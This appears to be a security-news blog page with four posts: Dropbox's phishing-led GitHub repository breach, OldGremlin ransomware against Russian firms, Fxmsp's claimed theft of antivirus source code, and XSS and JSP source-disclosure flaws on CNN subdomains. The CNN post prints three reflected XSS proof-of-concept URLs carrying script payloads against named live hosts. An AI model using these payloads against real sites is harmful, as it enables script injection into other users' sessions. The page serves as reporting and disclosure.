Search This Blog

Showing posts with label Source Code disclosure vulnerability. Show all posts

Dropbox Security Breach: Unauthorized Access to 130 Source Code Repositories

 

File hosting service, Dropbox reveals on Tuesday that it was the victim of a phishing campaign. The security breach allowed the unidentified threat actor to acquire unauthorized access to one of its GitHub accounts, compromising 130 of its source code repositories. 
 
"These repositories included our own copies of third-party libraries slightly modified for use by Dropbox, internal prototypes, and some tools and configuration files used by the security team," Dropbox published in an advisory. 
 
Dropbox discovered the breach on October 14, after GitHub reported the company of suspicious activities that began a day before the alert was sent. 
 
Upon further investigation of the security breach, it was disclosed that the source code accessed by the threat actors, contained the development team’s credentials, primarily API keys used by the team. 
 
"The code and the data around it also included a few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads, and vendors (for context, Dropbox has more than 700 million registered users)." the company added in the published advisory. 
 
The cyberattack was introduced more than a month after both GitHub and CircleCI reported accounts of phishing attacks. The phishing campaign was allegedly designed in order to access GitHub credentials via fraudulent notifications purporting to be from the CI/CD platform. 
 
These fraudulent emails notified the online users that their CircleCI session has expired, ploying the victims into logging in through their GitHub credentials. 
 
"These legitimate-looking emails directed employees to visit a fake CircleCI login page, enter their GitHub username and password, and then use their hardware authentication key to pass a One Time Password (OTP) to the malicious site," explains Dropbox. 
 
Alongside, GitHub in an advisory, stated, "While GitHub itself was not affected, the campaign has impacted many victim organizations." In regards to the recent phishing attacks, Dropbox confirmed that the attackers did not have access to customers’ accounts, password, or payment information, and its core apps infrastructure were not impacted in the breach. "Importantly, they did not include code for our core apps or infrastructure. Access to those repositories is even more limited and strictly controlled." the company noted.  
 
Furthermore, Dropbox told that it has been working on securing its environment following the security breach, using WebAuthn and hardware tokens or biometric factors.

Russian Groups are Plagued by OldGremlin Ransomware Threat

 

The new cyber-crime squad, known as OldGremlin, is actively targeting banks, medical institutions, software developers, and industrial firms, among other targets. The gang differentiates from all other ransomware groups by launching a limited number of campaigns – just under five since early 2021 – which solely target Russian firms and employ proprietary backdoors developed in-house.

OldGremlin has claimed ransoms as large as $3 million from one of its victims, despite being less active, which may indicate the ransomware business is approaching moonlighting. Two phishing attacks that were conducted near the end of March 2022 constitute the most current OldGremlin activities. It might be too early to say how many organizations were attacked, but security experts say roughly one Russian mining corporation is on the list of victims. The adversary did not deviate from its previously observed strategy of exploiting trending news topics to gain initial access. 

As per cybersecurity experts at Singapore-based cybersecurity firm Group-IB, this time OldGremlin scammed a senior auditor at a Russian financial organization, advising that the Visa and Mastercard payment service systems will be suspended due to recent sanctions placed on Russia.

The email directed recipients to a malicious Dropbox document that downloads TinyFluff, a backdoor that opens the Node.js interpreter and grants the attacker remote access to the target system. The email then allowed OldGremlin remote access to the machine via a malicious file that used a backdoor known as "TinyFluff," which the gang upgraded from a prior backdoor known as "TinyNode." The target receives a ransom note once the attacker has gained access to the system and has access to system data. A mining business, according to Group-IB, is one of the possible victims. 

Another well-known ransomware group, NB65, has been trying to frustrate Russian operations, including the alleged theft of 900,000 emails and 4,000 files from the state-owned television and radio broadcasting network VGTRK. In March, the organization exploited released source code from the Conti Ransomware gang – a Russia-linked threat actor — to create distinct ransomware for the first time. 

The researchers can study the directives for these steps of the assault using a traffic sniffer because they are provided in cleartext.
  • Gathering data on the infected system or device. 
  • Collecting information about the drives that are connected.
  • Executing a command in the cmd.exe shell and passing the output to the command and control server (C2) 
  • Receiving information about the system's installed plugins.
  • Obtaining information about files on the system drive's specified folders puts an end to the Node.js interpreter.
  • Before executing the last step of the assault, TinyCrypt/TinyCryptor, the group's proprietary ransomware payload, OldGremlin can spend months within the infiltrated network. 
The gang only ran one phishing effort in 2021, but it was enough to keep them occupied for the entire year as it gave them initial access to a network of various firms. Apart from the target Russian mining company, Group-IB believes that a higher number of OldGremlin victims will be discovered this year as a result of the group's March phishing operation. 
 
The researchers believe OldGremlin has Russian-speaking members based on the evidence they collected and after examining the quality of the phishing emails and decoy papers. They called the group's understanding of the Russian terrain "astonishing." OldGremlin defies the mold by focusing solely on Russian businesses including banks, industrial corporations, medical institutions, and software producers.

Russian hackers claim to have breached 3 US antivirus makers

A group of elite Russian hackers claims to have infiltrated their networks and stolen the source code for their software.

Researchers with Advanced Intelligence (AdvIntel) have been tracking the activity of the group on underground forums for some time. The hackers, who operate under the handle Fxmsp, have an established reputation for infiltrating well-protected networks. Their targets typically include highly-sensitive corporate and government information.

Two months ago AdvIntel saw Fxmsp reappear on hacking forums after a half-year hiatus. It's probably no coincidence that the group reported that its campaign against security software firms had kicked off six months earlier.

Fxmsp laid low until it had achieved its goal. When its stealth operation concluded, the hackers allegedly made off with more than 30 terabytes of data from their latest victims. They posted screenshots showing folders, files, and source code.

The asking price for this trove of data: a cool $300,000. They also claimed to still have access to the networks and would throw that in at no extra charge to the lucky buyer.

If what they're offering is the real deal, then this is pretty much a worst-case scenario for the three firms that were compromised. Access to the source code allows hackers the opportunity to locate showstopping vulnerabilities and exploit them, rendering the software useless... or worse. They could even turn what was once legitimate protection from malware into an incredibly effective spying tool.

Multiple XSS and JSP Source code disclosure vulnerability in CNN

An Information Security researcher has discovered multiple Cross Site scripting vulnerability that affects one of the Top News channel website, CNN.

Few days back, The vulnerability was reported by  Quister Tow. The vulnerabilities resides in three different sub domain of CNN: searchapp.cnn.com, audience.cnn.com,dynamic.si.cnn.com.

POC:

1.http://dynamic.si.cnn.com/baseball/mlb/search/mlbPlayerSearchResults.jsp?searchName=<script>alert(/QuisterTow/)</script>

2.http://searchapp.cnn.com/weboffers/weboffers.jsp?itype=cnn&cid=cnn&text=&domains=;</script><script>alert(/QuisterTow/);</script>&csiID=csi3

3.http://audience.cnn.com/services/si/flow/scoreAlertManagement?_flowExecutionKey=<script>alert(/QuisterTow/)</script>




While i was verifying the XSS vulnerabilities, i found another critical security flaw in the website that expose the source code.

POC for JSP Source Code disclosure
http://sportsillustrated.cnn.com/baseball/mlb/search/mlbPlayerSearchResults.jsp

I have immediately reported CNN about the security flaw. But there is no response from their side and so i am publishing the details here.